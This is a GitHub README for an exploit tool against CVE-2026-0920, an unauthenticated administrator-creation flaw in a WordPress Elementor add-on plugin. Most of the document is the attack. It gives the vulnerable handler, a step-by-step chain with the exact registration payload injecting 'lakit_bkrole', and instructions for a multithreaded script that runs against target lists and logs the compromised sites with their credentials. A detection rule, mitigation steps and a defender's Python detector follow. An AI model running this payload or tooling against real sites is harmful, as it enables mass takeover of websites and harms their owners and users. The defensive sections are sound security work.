Nxploited/CVE-2026-0920-

GitHub: Nxploited/CVE-2026-0920-

An unauthenticated privilege-escalation exploit tool for CVE-2026-0920 that demonstrates the attack chain and verifies the risk of WordPress administrator takeover.

Stars: 0 | Forks: 0

# CVE-2026-0920 - LA-Studio Element Kit for Elementor <= 1.5.6.3 - Unauthenticated Privilege Escalation: Administrator Creation via Backdoor (`lakit_bkrole` parameter)
[![Telegram](https://img.shields.io/badge/Telegram-KNxploited-2CA5E0?style=for-the-badge&logo=telegram&logoColor=white)](https://t.me/KNxploited) [![CVE](https://img.shields.io/badge/CVE-2026--0920-critical?style=for-the-badge&logo=cve&logoColor=white&color=CC0000)](https://www.cve.org/CVERecord?id=CVE-2026-0920) [![CVSS](https://img.shields.io/badge/CVSS-9.8%20CRITICAL-red?style=for-the-badge)](https://nvd.nist.gov/vuln/detail/CVE-2026-0920) [![Python](https://img.shields.io/badge/Python-3.8%2B-blue?style=for-the-badge&logo=python&logoColor=white)](https://python.org) [![License](https://img.shields.io/badge/License-Educational%20Only-yellow?style=for-the-badge)](#%EF%B8%8F-disclaimer)
## 🧠 Overview

**CVE-2026-0920** is a **CVSS 9.8 Critical** vulnerability found in the **LA-Studio Element Kit for Elementor** WordPress plugin.

The flaw lives in the `ajax_register_handle()` function, which handles unauthenticated user registration over AJAX. The function places no restriction on the `lakit_bkrole` parameter, which lets a completely unauthenticated **attacker assign themselves the `administrator` role at registration time** and achieve a **full WordPress administrator takeover in a single request**.

| Field | Details |
|------------------------|------------------------------------------------------|
| **CVE ID** | CVE-2026-0920 |
| **Plugin** | LA-Studio Element Kit for Elementor |
| **Slug** | `lakit` / `la-studio-element-kit-for-elementor` |
| **Affected versions** | All versions up to and including **1.5.6.3** |
| **Vulnerability type** | Unauthenticated privilege escalation / administrator creation |
| **Attack vector** | Network, no authentication required |
| **CVSS 3.1 score** | **9.8 Critical** |
| **CVSS vector** | `AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` |
| **CNA** | Wordfence |
| **Impact** | Full WordPress administrator takeover |
| **Researcher** | Nxploited |

## 💀 Vulnerability Deep Dive

The root cause is a missing role permission check in the plugin's AJAX registration handler:

```php
// Registered with no authentication requirement
add_action('wp_ajax_nopriv_lakit_ajax', [$this, 'ajax_register_handle']);

public function ajax_register_handle() {
    $actions = json_decode(stripslashes($_POST['actions']), true);
    foreach ($actions as $req) {
        if ($req['action'] === 'register') {
            $data = $req['data'];
            $user_data = [
                'user_login' => $data['username'],
                'user_pass'  => $data['password'],
                'user_email' => $data['email'],
                'role'       => $data['lakit_bkrole'], // ← ATTACKER CONTROLLED
            ];
            // No validation of $data['lakit_bkrole'] against allowed roles
            wp_insert_user($user_data); // Administrator created silently
        }
    }
}
```

**Why it is critical:**

- `wp_ajax_nopriv_*` = reachable by **any unauthenticated user**
- `lakit_bkrole` accepts an arbitrary WordPress role string, including `administrator`
- A single POST request creates a fully privileged administrator account
- The nonce required by the handler is publicly exposed in the site's front-end HTML/JS
- By default there is no rate limiting, no CAPTCHA enforcement and no e-mail verification requirement

## ⚔️ Attack Chain

```text
Step 1 — Nonce Harvesting
──────────────────────────────────────────────────────────────────────
GET / (or /index.php, /home, /?page_id=1)

Search HTML/JS for:
  "ajaxNonce": ""          ← Inline JSON config
  ajaxNonce: ''            ← JS variable
  data-ajaxnonce=""        ← HTML attribute

Nonce is publicly accessible — no login required.
        ↓ ajaxNonce extracted ✔️
──────────────────────────────────────────────────────────────────────
Step 2 — Admin Account Registration
──────────────────────────────────────────────────────────────────────
POST /wp-admin/admin-ajax.php
  action  = lakit_ajax
  _nonce  =
  actions = {
    "req1": {
      "action": "register",
      "data": {
        "email":    "adminSA12@exploit.com",
        "password": "adminSA",
        "username": "Nx_admin",
        "lakit_field_log":  "yes",   ← use supplied username
        "lakit_field_pwd":  "yes",   ← use supplied password
        "lakit_field_cpwd": "no",    ← skip password confirm
        "lakit_bkrole":     "1",     ← trigger admin role injection
        "lakit_recaptcha_response": ""
      }
    }
  }
        ↓ Administrator account silently created ✔️
──────────────────────────────────────────────────────────────────────
Step 3 — Full Admin Verification
──────────────────────────────────────────────────────────────────────
POST /wp-login.php
  log = Nx_admin
  pwd = adminSA
        ↓ Session cookies obtained
→ GET /wp-admin/plugin-install.php
        ↓ Plugin install page accessible = CONFIRMED FULL ADMIN ✔️
```

## ⚙️ Requirements

```bash
pip install requests colorama
```

| Dependency | Purpose |
|--------------|------------------------------------------------|
| `requests` | HTTP requests, session handling, cookie management |
| `colorama` | Coloured terminal output on all platforms |
| `threading` | Concurrent multi-target processing |
| `re` | Regex-based nonce extraction from HTML/JS |

## 📂 File Structure

```text
CVE-2026-0920/
├── CVE-2026-0920.py        # Main exploit script
├── list.txt                # Target URLs — one per line
├── success_results.txt     # Auto-generated: pwned targets + credentials
```

## 🚀 Usage

### Step 1: Configure credentials (optional)

Open `CVE-2026-0920.py` and edit the constants at the top to set the desired account details:

```python
ADMIN_EMAIL    = "adminSA12@exploit.com"   # Email for the new admin account
ADMIN_PASSWORD = "adminSA"                 # Password for the new admin account
ADMIN_USERNAME = "Nx_admin"                # Username for the new admin account
```

### Step 2: Prepare the target list

Create `list.txt` with one target URL per line:

```text
https://target1.com
https://target2.com
http://target3.com
```

### Step 3: Run the exploit

```bash
python CVE-2026-0920.py
```

You will be prompted for:

```text
Enter targets list filename (e.g. list.txt): list.txt
Enter number of threads (1-50): 20
```

### Step 4: Monitor the live output

The script produces live, colour-coded terminal output:

```text
[14:22:01] [*] https://target.com - Starting target
[14:22:02] [+] https://target.com - kay: a4f9c2b1e3
[14:22:02] [*] https://target.com - AJAX HTTP status: 200
[14:22:03] [+] https://target.com - AJAX response indicates success
[14:22:04] [*] https://target.com - Full admin verification: OK
============================================================
[ SUCCESS BLOCK ]
Site       : https://target.com
Result     : SUCCESS
AJAX OK    : YES
FULL ADMIN : YES (login + plugin install access)
============================================================
```

| Colour | Meaning |
|-------------|--------------------------------------------------|
| 🔵 Cyan `[*]` | Informational: the current step is in progress |
| 🟢 Green `[+]` | Positive signal: partial or full success |
| 🟡 Yellow `[!]` | Warning: ambiguous result, needs further inspection |
| 🔴 Red `[-]` | Failure: target not exploitable or an error occurred |

### Step 5: Check the results

Successful exploitation results are written to `success_results.txt`:

```text
https://victim.com | USERNAME:Nx_admin | EMAIL:adminSA12@exploit.com | PASSWORD:adminSA | LOGIN:FULL_ADMIN_OK | RESP_SUCCESS:YES | NONCE:a4f9c2b1e3
```

Each line carries the complete record: target, credentials, login status, AJAX response status and the nonce used.

## 🖥️ Script Parameter Reference

| Parameter | Default | Description |
|-------------------|----------------------------|----------------------------------------------|
| Target file | `list.txt` | File containing target URLs |
| Thread count | `10` (max: `50`) | Number of concurrent worker threads |
| `ADMIN_EMAIL` | `adminSA12@exploit.com` | E-mail of the injected administrator account |
| `ADMIN_PASSWORD` | `adminSA` | Password of the injected administrator account |
| `ADMIN_USERNAME` | `Nx_admin` | Username of the injected administrator account |

## 🔬 Verification Logic

The script performs **two-stage verification** to eliminate false positives:

```text
Stage 1 — AJAX Response Analysis
  Checks for success markers in the JSON response:
    • "created successfully"
    • "success":true
    • "type":"success"
    • "status":"success"

Stage 2 — Real Login + Plugin Install Access Test
  1. POST /wp-login.php with injected credentials
  2. GET /wp-admin/plugin-install.php
  3. Confirm 200 response + plugin upload form present
  4. Confirm no redirect back to wp-login.php

Only BOTH stages passing = TRUE SUCCESS reported
```

This removes false positives on sites where the AJAX endpoint returns `200 OK` but registration silently fails.

## 📊 Detection Signature

The exploit produces the following specific network pattern, provided for defenders and WAF authors:

```http
POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

action=lakit_ajax&_nonce=&actions={"req1":{"action":"register","data":{...,"lakit_bkrole":"1",...}}}
```

**WAF / IDS rule (pseudocode):**

```text
IF   request.method == POST
AND  request.path   == "/wp-admin/admin-ajax.php"
AND  request.body   CONTAINS "lakit_ajax"
AND  request.body   CONTAINS "lakit_bkrole"
THEN BLOCK + ALERT (Privilege Escalation Attempt — CVE-2026-0920)
```

## 🛡️ Mitigation and Remediation

If you are a **site owner, developer or defender**, act immediately:

- ✅ **Update** LA-Studio Element Kit for Elementor to a version **above 1.5.6.3**
- ✅ **Deactivate and remove** the plugin until a version confirmed to be fixed is installed
- ✅ **Audit** all WordPress administrator accounts and remove any unrecognised entry immediately
- ✅ **Enforce** server-side role validation: never trust a user-supplied role value without checking it against an allowlist
- ✅ **Block** unauthenticated POST requests to `admin-ajax.php` that contain `lakit_bkrole` at the WAF layer
- ✅ **Monitor** server and WordPress activity logs for invocations of the `lakit_ajax` AJAX action
- ✅ **Enable** two-factor authentication on all existing administrator accounts as an interim safeguard
- ✅ **Review** the Wordfence advisory and apply every hardening step

## ⚠️ Disclaimer

```text
THIS TOOL IS PROVIDED STRICTLY FOR EDUCATIONAL, AUTHORIZED PENETRATION TESTING,
AND SECURITY RESEARCH PURPOSES ONLY.

By downloading, executing, or modifying this script, you explicitly agree:

  • You hold EXPLICIT, WRITTEN authorization from the owner of every target
    system you test. No exceptions. No grey areas.
  • You are operating within a formally scoped, authorized penetration testing
    engagement or a controlled lab environment.
  • You will NOT use this tool against any system, network, or infrastructure
    without documented legal permission.
  • Nxploited and all contributors bear ZERO liability for unauthorized use,
    data loss, system damage, legal proceedings, or criminal prosecution
    arising from the use of this tool.

Unauthorized use of this exploit constitutes a criminal offense under:
  — Computer Fraud and Abuse Act (CFAA), USA
  — Computer Misuse Act (CMA), UK
  — EU Directive 2013/40/EU on Attacks Against Information Systems
  — Saudi Arabia's Anti-Cyber Crime Law (No. M/17)
  — And all equivalent national and international cybercrime legislation.

USE RESPONSIBLY. HACK ETHICALLY. DISCLOSE RESPONSIBLY.
```

## 👤 Author

| | |
|---------------|-----------------------------------------------------------|
| **Handle** | Nxploited |
| **Telegram** | [@KNxploited](https://t.me/KNxploited) |
| **GitHub** | [github.com/Nxploited](https://github.com/Nxploited) |
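The detection signature, the WAF/IDS pseudocode rule and the "block"/"monitor" items of the mitigation list above, implemented as a runnable Python example. This is added here for defenders and is not part of the exploit script or the plugin; the sample requests are constructed for the demo (the nonce is a placeholder, the account details are dummy values), the verdict labels `block` / `alert` / `allow` are this example's own naming, and the only assumption about traffic is the request shape documented on this page (a form-encoded POST to `admin-ajax.php` carrying `action=lakit_ajax` and a JSON `actions` blob).

```python
import json
from urllib.parse import parse_qs, urlencode

AJAX_PATH = "/wp-admin/admin-ajax.php"

# Constructed sample traffic (not captured from any real site).
SAMPLE_REQUESTS = [
    {   # 1: register sub-request carrying lakit_bkrole -> must be blocked
        "method": "POST", "path": AJAX_PATH,
        "body": urlencode({
            "action": "lakit_ajax", "_nonce": "PLACEHOLDER_NONCE",
            "actions": json.dumps({"req1": {"action": "register", "data": {
                "username": "example_user", "email": "user@example.com",
                "password": "dummy", "lakit_bkrole": "1"}}}),
        }),
    },
    {   # 2: plugin register call without the role parameter -> monitor only
        "method": "POST", "path": AJAX_PATH,
        "body": urlencode({
            "action": "lakit_ajax", "_nonce": "PLACEHOLDER_NONCE",
            "actions": json.dumps({"req1": {"action": "register", "data": {
                "username": "example_user", "email": "user@example.com",
                "password": "dummy"}}}),
        }),
    },
    {   # 3: unrelated admin-ajax action (WordPress heartbeat) -> allow
        "method": "POST", "path": AJAX_PATH,
        "body": urlencode({"action": "heartbeat", "_nonce": "PLACEHOLDER_NONCE"}),
    },
    {   # 4: GET to the same endpoint -> allow (the rule is POST-only)
        "method": "GET", "path": AJAX_PATH, "body": ""},
]


def parse_form_body(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body into a flat dict."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def find_role_injection(actions_raw: str) -> list:
    """Return every lakit_bkrole value carried by a 'register' sub-request
    inside the JSON 'actions' parameter. Decoding the JSON instead of only
    substring-matching the raw body lets the verdict report the injected value."""
    try:
        actions = json.loads(actions_raw)
    except (TypeError, ValueError):
        return []
    if not isinstance(actions, dict):
        return []
    hits = []
    for req in actions.values():
        if isinstance(req, dict) and req.get("action") == "register":
            data = req.get("data")
            if isinstance(data, dict) and "lakit_bkrole" in data:
                hits.append(str(data["lakit_bkrole"]))
    return hits


def classify(request: dict) -> dict:
    """Apply the page's rule: a POST to admin-ajax.php whose body invokes
    lakit_ajax and carries lakit_bkrole is blocked; any other lakit_ajax
    invocation is flagged for monitoring; everything else is allowed."""
    if request["method"] != "POST" or request["path"] != AJAX_PATH:
        return {"verdict": "allow", "reason": "not an admin-ajax POST", "roles": []}
    form = parse_form_body(request["body"])
    if form.get("action") != "lakit_ajax":
        return {"verdict": "allow", "reason": "other AJAX action", "roles": []}
    roles = find_role_injection(form.get("actions", ""))
    if roles or "lakit_bkrole" in request["body"]:
        return {"verdict": "block",
                "reason": "privilege escalation attempt (CVE-2026-0920)",
                "roles": roles}
    return {"verdict": "alert", "reason": "lakit_ajax invocation (monitor)", "roles": []}


def scan(requests: list) -> list:
    """Classify a batch of request records; returns one verdict per request."""
    return [classify(r) for r in requests]


if __name__ == "__main__":
    for req, verdict in zip(SAMPLE_REQUESTS, scan(SAMPLE_REQUESTS)):
        print(f"{req['method']} {req['path']} -> {verdict['verdict']:5} | {verdict['reason']}")
```

The raw substring check (`"lakit_bkrole" in request["body"]`) is kept alongside the JSON decode so that the verdict still fires if the `actions` blob is malformed but the parameter name is present, matching the conservative "block + alert" intent of the pseudocode rule; the decoded `roles` list is what you would forward to the alert so an analyst can see which role value was requested.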
Built by Nxploited · Authorized security research only · CVSS 9.8 Critical

Tags: AJAX, Backdoor, Critical, CVE-2026-0920, CVSS 9.8, Elementor, lakit_bkrole, Privilege Escalation, Unauthenticated, Web report viewer, WordPress security, WordPress plugins, protocol analysis, backend user creation, threat simulation, plugin security, OS monitoring, unauthenticated vulnerability, privilege escalation, user registration, administrator takeover, reverse-engineering tools